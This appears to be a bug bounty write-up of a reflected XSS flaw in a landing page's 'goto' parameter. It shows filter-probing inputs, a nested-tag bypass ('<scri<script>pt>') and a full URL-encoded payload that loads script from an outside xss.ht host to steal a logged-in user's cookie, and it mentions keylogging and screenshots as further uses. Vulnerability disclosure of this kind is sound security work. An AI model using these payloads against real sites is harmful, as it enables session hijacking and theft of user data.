Summary

1. By reading the V1 report, I found that the landing page has a goto parameter that can XSS

2. I tried the fuzz parameter myself, but fuzzing out the goto parameter showed 503

   

3. Note: It is best to Fuzz XSS Payload, so you may not get the best results. You need to analyze and test it yourself step by step to be able to do so.

Steps

1. A simple argument to the goto parameter is found to be displayed under the dom tree

   

2. Test JavaScrIpt:alert(0) -> found filtering () symbols

   

3. Testing "><<script> -> found filtering <script> tags -> but strangely ">< doesn't filter, only blacklisted words.

   

4. Keep testing <scri<script>pt> -> and find that this time there is no filtering.

   

5. So the attacker can combine some special payloads to bypass the restriction to occur xss. And after loading external js, the malicious code is not restricted by the server.

testgo%22%3E%3Cscri%3Cscript%3Ept%20src=//johnstone.xss.ht%3E%3C/sc%3C/script%3Eript%3E

6. Send this link to the logged-in user and found that the user's cookie was successfully stolen

   

Vulnerability Exploitation

1. If you can load external js you can write a lot of js code, you can not be restricted by the browser address, in addition to stealing the value of cookies, you can also take a screenshot of the user of the page to send to the attacker, you can also listen to the victim's keyboard keys and so on.

Suggestions for fixing

1. Encode HTML entities for <>

2. Add <> to the blacklist.

Study reference materials

1. https://www.bugbountyhunter.com/vulnerability/?type=xss

2. https://book.hacktricks.xyz/pentesting-web/xssi-cross-site-script-inclusion